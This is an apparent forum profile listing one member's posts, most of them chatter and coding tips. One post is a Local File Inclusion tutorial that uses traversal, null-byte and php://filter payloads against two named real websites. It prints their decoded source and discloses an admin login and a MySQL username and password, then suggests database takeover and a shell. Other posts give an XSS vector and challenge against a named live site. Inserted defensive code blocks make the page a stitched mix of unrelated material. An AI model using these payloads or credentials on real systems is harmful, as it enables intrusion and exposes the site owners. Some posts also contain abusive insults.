
dancezar

Active Members
  • Posts: 981
  • Joined
  • Last visited
  • Days Won: 20

Everything posted by dancezar

  1. I'm also looking for one of these toys (second-hand); I'm waiting for a PM too :D
  2. 3 days to add a fucking (? The single quote was there but you are blind. Enjoy your stay on RST; I have a feeling that within two hours at most you'll do something and get banned // someone close the topic // edit: done
  3. One minute later and you are still stupid [image: asda] // and it's the latest version of Chrome too
  4. MusicSRC.com | \' Onerror =alert(1) Asd= Artists & Albums' Why is your fucking bypass shit so challenging? Haxor my ass, who do you think you are
  5. If they delete his account he might end up like this one
  6. I also had a classmate who was just as desperate for SA-MP. He played SA-MP all day and missed a lot of school. When his parents came home from work around 4-6 for their lunch break, he would leave for school too (jumped out of the first-floor window, no big deal). The cure was his parents. A classmate talked to his father, and when he found out he came to school to see for himself. The SA-MP-desperate classmate got beaten by his dad within an inch of his life (his dad was a firefighter) and he never needed SA-MP again.
  7. In this tutorial you will learn the php://filter method for exploiting an LFI.

     What LFI is: LFI, or Local File Inclusion, means the PHP include function is used improperly, so through an LFI we can include (not just fetch the source of) and execute PHP code from any page on the server.

     How to find an LFI: an LFI usually appears in this form: site.com/index.php?page=ceva.php. If we add something after site.com/index.php?page=ceva.php; we get an error like this: http://s24.postimg.org/u93f51bth/lfi2.png The error says that PHP cannot include a file that does not exist. Using ../ (one directory up) we can navigate through folders and include any file on the server: site.com/index.php?page=../etc/passwd

     Using the null byte character: it is used when the PHP script appends an extension (usually .php, .html, .txt) after the parameter it reads. The null byte character %00 "cancels" the extension that follows the parameter and is used like this: site.com/index.php?page=../etc/passwd%00

     Now that we have had a short introduction to the term LFI, I will go on to present the php://filter method. Suppose you have an LFI in a site: you can pull /etc/passwd but cannot find any log file, and the php://input method does not work. One more method of exploiting an LFI remains: the php://filter method. With this method we can turn an LFI into a source code disclosure, i.e. we can read the source of the files on the server.

     We have the following LFI: site.com/index.php?page=../etc/passwd http://s9.postimg.org/ipogmj0gf/lfi1.png Suppose we have no access to logs and cannot turn the LFI into remote code execution; we will try the php://filter method.

     The php://filter method is used like this: site.com/index.php?page=php://filter/convert.base64-encode/resource=FISIER where FISIER is the name of the file you want to read. What does the instruction php://filter/convert.base64-encode/resource=FISIER do? It tells the include function to take the contents of the page FISIER, encode it in base64 and display it. This instruction only works on scripts whose entry point is the include function, and only those that have nothing else before or after the injected parameter (as in, for example, include('pages'.$_REQUEST['page'])).

     The result will be the following; I read the index.php file itself: http://s24.postimg.org/hx9pj12qd/lfi3.png The page gives us the source contents encoded in base64, and with a decoder we can obtain the source.

     Applicability: what can be done with this method :-/ Well, we can get access to the login data of admin panels or databases. We have the following site: Sportstudio Bodyworld Schkeuditz bei Leipzig http://s23.postimg.org/ta0365agb/lfi4.png We will test the php://filter method and read the source of index.php: Sportstudio Bodyworld Schkeuditz bei Leipzig http://s21.postimg.org/x2fgrchg7/lfi5.png What we got back is the base64-encoded source (omitted here). Decoded it is:

     ```php
     <?php
     include("user.php");
     $PHPSESSID = $_REQUEST["PHPSESSID"];
     $page = $_REQUEST["page"];
     $benutzername = $_REQUEST["benutzername"];
     $passwort = $_REQUEST["passwort"];
     $login = $_REQUEST["login"];
     $logout = $_REQUEST["logout"];
     $senden = $_REQUEST["senden"];
     $datei = $_REQUEST["datei"];
     If ($benutzername && $passwort)
       If ($benutzername === $user && $passwort === $pass) {
         session_start();
         header("Location: index.php?page=login.php&login=ok");
       } else {
         header("Location: index.php?page=login.php&login=falsch");
       }
     else {
       If ($PHPSESSID) { session_start($PHPSESSID); }
     }
     If ($senden) {
       If ($senden=="Ja") {
         $bild = $_REQUEST["bild"];
         If ($bild) { @unlink("./news_pics/$bild"); }
         @unlink($datei);
         header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
       } elseif ($senden=="Nein") {
         header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
       }
     }
     ?>
     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
     <html>
     <head>
     <title>Sportstudio Bodyworld Schkeuditz bei Leipzig</title>
     <!-- [meta tags, stylesheet link and the static navigation tables omitted here] -->
     <td width=560> <?php include("ueberschriften.php"); ?> </td>
     ...
     <td valign="top"> <?php include("news.php") ?> </td>
     ...
     <td valign="top" width=560>
     <?php
     If (strpos($_REQUEST["page"], "http") === 0 || strpos($_REQUEST["page"], "http") > 0) { $page="home.php"; };
     If (strpos($_REQUEST["page"], "www") === 0 || strpos($_REQUEST["page"], "www") > 0) { $page="home.php"; };
     If (strpos($_REQUEST["page"], "ftp") === 0 || strpos($_REQUEST["page"], "ftp") > 0) { $page="home.php"; };
     If ($page) { include($page); } else { include("home.php"); }
     ?>
     </td>
     ```

     In the source we see the following instruction: include('user.php'); Now we will read the user.php page: http://www.bodyworld-schkeuditz.de/index.php?page=php://filter/convert.base64-encode/resource=user.php What we got: PD9waHANCg0KICAkdXNlciA9ICJjYW1pYmIiOw0KICAkcGFzcyA9ICJjYW1pYmIiDQoNCg0K Decoded: $user = "camibb"; $pass = "camibb" We go to the login.php page and log in with the data above (not much can be done there, it is only for the concept).

     Another example: Impresariat Alwernia - Andrzej Grabowski Show http://s17.postimg.org/9q9g8rn7z/lfi6.png We will read index.php http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://s27.postimg.org/5hgc3dkg3/lfi7.png What we got back is the base64-encoded source (omitted here). Decoded:

     ```php
     <head>
     <TITLE>Impresariat Alwernia - Andrzej Grabowski Show</TITLE>
     <!-- [meta tags, script, style block and the layout tables omitted here] -->
     <TD colspan="3"><?include("header_center.htm")?></TD>
     ...
     <td class="leftbackground" valign="top"><?include("left.htm")?></TD>
     <td class="center" valign="top">
     <?
     // -----------------------------------------------------------------------------
     require_once ("admin/data_base.class");
     $connid = new DataBaseConnect();
     // -----------------------------------------------------------------------------
     include ('newsy/engine.php3');
     $page = $_GET['page'];
     $subpage = $_GET['subpage'];
     $parent = $_GET['parent'];
     $pid = $_GET['pid'];
     if (!$page) include ('center.htm');
     else if ($page == 'newsy' && $subpage == 'showall') include ('newsy/newsy.php3');
     else if ($page == 'newsy' && $subpage == 'show') include ('newsy/news.php3');
     else if ($page == 'strona') include ('newsy/strona.php3');
     else include ($page);
     ?>
     </td>
     <td class="rightbackground" valign="top"><?include("newsy/polecamy.php3")?></TD>
     ...
     <td class="footerbackgroundleft"><?include("footer_left.htm")?></TD>
     <td class="footerbackground"><?include("footer_center.htm")?></TD>
     <td class="footerbackgroundright"><?include("footer_right.htm")?></TD>
     ```

     What is interesting in the source is admin/data_base.class, and we will read its source: http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=admin/data_base.class From there we got the base64-encoded source (omitted here). Decoded:

     ```php
     <?
     class DataBaseConnect {
       var $mysqlidconn;
       var $databasename;
       var $results;
       var $tablename;
       function DataBaseConnect() {
         // $mysql_host = "localhost";
         // $mysql_user = "root";
         // $mysql_pass = "";
         $mysql_host = "localhost";
         $mysql_user = "grabowscy";
         $mysql_pass = "qHInJi4o";
         $mysql_db_name = "grabowscy";
         $nazwa_tabeli = "grabowscy_";
         $id_conn = @Mysql_select_db($mysql_db_name) or die('<span style="font-family: Verdana; font-size: 13px"><b>Problem z dostępem do bazy danych.</b>');
         $this -> mysqlidconn = $id_conn;
         $this -> databasename = $mysql_db_name;
         $this -> tablename = $nazwa_tabeli;
       }
       function CheckTableExists($table) {
         $this->results = mysql_db_query($this->databasename, "SELECT 1 FROM `$table` LIMIT 0", $this->mysqlidconn);
         return $this->results;
       }
       function QueryToDataBase($query) {
         $this->results = mysql_query($query) or die("Problem z dostępem do bazy danych. ".$query);
         return $this->results;
       }
     }
     ?>
     ```

     And voilà: $mysql_user = "grabowscy"; $mysql_pass = "qHInJi4o"; $mysql_db_name = "grabowscy"; From here you can get access to the database, take over the admin panel and get a shell :D. These examples were given only to demonstrate the impact of the vulnerability. That is about all I had to say; I hope the tutorial was useful to you. Have a good day :D.
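Added example, not code from the post or from either site it reads: both dispatchers above guard include($page) with a substring blocklist for "http", "www" and "ftp", which is why ../, %00 and php://filter all went through. The fix is to stop letting request data name the file at all; ALLOWED_PAGES, the pages/ paths and the confine_to_dir helper are assumptions for this example.

```php
<?php
// Added example, not the original post's or either site's code. The two
// dispatchers read above only search $_REQUEST['page'] for "http", "www"
// and "ftp" before calling include($page); "../", "%00" and "php://filter"
// contain none of those substrings, so they pass. Safe pattern: never let
// request data name the file; map a key onto an allowlist instead.

// Assumed allowlist for this example: request key => file on disk.
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',
    'service' => 'pages/service.php',
    'kontakt' => 'pages/kontakt.php',
    'login'   => 'pages/login.php',
];

// Map the ?page= value onto the allowlist; null means "not a known page".
// An exact array-key lookup cannot be steered by "../", wrappers or NUL bytes.
function resolve_page($param): ?string
{
    if ($param === null || $param === '') {
        return ALLOWED_PAGES['home'];
    }
    if (!is_string($param)) {          // ?page[]=x arrives as an array
        return null;
    }
    return ALLOWED_PAGES[$param] ?? null;
}

// Defence in depth for code that must keep a file name in the URL: confine
// the resolved path to one directory. realpath() canonicalises "../" and
// returns false for "php://..." (not a filesystem path) and for missing files.
function confine_to_dir(string $param, string $base_dir): ?string
{
    if (strpos($param, "\0") !== false) {   // %00 decodes to a NUL byte
        return null;
    }
    $base = realpath($base_dir);
    $real = realpath($base_dir . '/' . basename($param));
    if ($base === false || $real === false) {
        return null;
    }
    // basename('..') is still '..', so also require the result to stay inside.
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Dispatcher: the vulnerable version was include($page); this one only ever
// includes a path that came out of the allowlist, never the raw parameter.
$target = resolve_page($_REQUEST['page'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```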
  8. Kind of wrongly written: "where you can find passwords besides /etc/passwd would be:" etc/passwd has no passwords. Then you forgot to mention the null byte %00 for when the script appends .php at the end. And where are the php://input and php://filter methods?
  9. Well, plus it can also cause problems with %, since it replaces it with NULL. For example you have a login page and via GET you have a variable that sends the user to a page after they log in, and you keep that value in a hidden input. The logical thing would be to apply htmlentities, filter the word javascript: with case sensitivity and urldecode to avoid the XSS; if you use your "protection script" against XSS you can bypass it with a bypass like java%script:alert(1); your script will replace % with NULL and your string will return this output: javascript:alert(1); which is not good. You should replace % with - or something else.
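Added example, not the commenter's code: the filter chain described above removes "javascript:" and then removes "%", so the second pass reassembles what the first pass was looking for. Rather than choosing a better replacement character, decode first, then accept only what a post-login redirect is allowed to be (a site-relative path) and reject the rest; the next parameter name is an assumption.

```php
<?php
// Added example, not the comment author's code. The filter it describes runs
// "remove javascript:" and then "remove %" in that order, so "java%script:"
// survives the first pass and is rebuilt by the second. Reordering is
// fragile; the robust rule is: decode fully, then accept only what a
// post-login redirect may be (a site-relative path), and reject the rest.

// Decode repeatedly until the value stops changing, so a double-encoded
// input is judged in the form the browser would finally see. Bounded so a
// pathological input cannot loop forever.
function fully_decode(string $value): string
{
    for ($i = 0; $i < 4; $i++) {
        $next = rawurldecode($value);
        if ($next === $value) {
            break;
        }
        $value = $next;
    }
    return $value;
}

// True only for an absolute site path such as "/account/home".
// Rejects anything with a scheme (javascript:, data:, http:), a
// protocol-relative "//host" form, control characters or backslashes.
function is_safe_redirect(string $raw): bool
{
    $url = fully_decode($raw);
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {   // browsers ignore these inside a scheme
        return false;
    }
    if ($url === '' || $url[0] !== '/' || strpos($url, '\\') !== false) {
        return false;
    }
    if (strpos($url, '//') === 0) {                 // "//host/..." is scheme-relative
        return false;
    }
    // A leading "/" already rules out "scheme:", but parse_url is a cheap
    // second opinion that the value carries neither a scheme nor a host.
    $parts = parse_url($url);
    return $parts !== false && !isset($parts['scheme']) && !isset($parts['host']);
}

// Usage: keep the value only if it validates; otherwise fall back to a
// fixed page. Whatever is echoed is still entity-encoded for the attribute.
$next = $_GET['next'] ?? '/';
$redirect = is_string($next) && is_safe_redirect($next) ? $next : '/';
printf('<input type="hidden" name="next" value="%s">',
       htmlspecialchars($redirect, ENT_QUOTES, 'UTF-8'));
```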
  10. Hook your script up to a DB too and let's see
  11. Steganography - Wikipedia, the free encyclopedia
  12. How long did they take to answer you? They kept me waiting for a month, first telling me to send it through the bug bounty form, then to upload the video to YouTube, and I still don't have an answer.
  13. // Yes, it was a joke
  14. Then instead of $_SERVER['REMOTE_ADDR'] try putting $_SERVER["HTTP_CF_CONNECTING_IP"]
  15. $name=$_REQUEST['name']."--".$_SERVER['REMOTE_ADDR']; and you will receive by mail something like name--ip, or in the subject $subject="Message sent using your contact form--".$_SERVER['REMOTE_ADDR'];
  16. I exaggerated a bit; it is more like Medium to HARD. Toshib4 solved it in that time because he is skilled (by the way, well done :D) // I edited the title
  17. Target: hxxp://www.musicsrc.com/search.php?query= Rules: - Inject the XSS vector only in the indicated link; no other location is allowed - Send the syntax by PM - Do not disclose the solution Proof: http://s7.postimg.org/w65m8ip63/xss_challenge.png Solvers: - Toshib4 - askwrite - -
  18. Well, it depends; some people use the same password everywhere.
  19. html+css+photoshop = you will be able to make static HTML templates; html+css+javascript (possibly jquery)+photoshop = you will be able to make dynamic HTML templates with animations and such; html+css+javascript+php+photoshop = you will be able to make templates that also involve PHP code, possibly WordPress themes. Then you can update your knowledge by moving from html->html5 and then from css->css3; if you start directly with those you won't understand anything.
  20. There are plenty of hints, plus he put it in bold. You use Protect your critical passwords with strong encryption online. and there you have everything you need // he teased you a bit because he spoon-fed you; you should have done a little research on Google and that was it. In general most people who look for help on RST want something like "you go there, you see that, you click there, then blah blah blah" when you have the biggest encyclopedia at your disposal, GOOGLE (but you have to know how to search)
  21. Protect your critical passwords with strong encryption online.
  22. I solved the problem; send me a PM with your solution and then I will send you mine
  23. As if the fine wasn't enough, they got a beating too; what can you do, stupidity hurts. // If they had been smart boys they would have the money in their pockets now and the girls where they belong
  24. http://s8.postimg.org/heaqe1g11/sqli_renegade2.png thanks, you have a PM
  25. Not necessarily in a while; it works in a for too, I'm trying it now // one thing I'm unclear on: so the tank lets it go n kilometres, do I have to read the distance in km from A to B as well?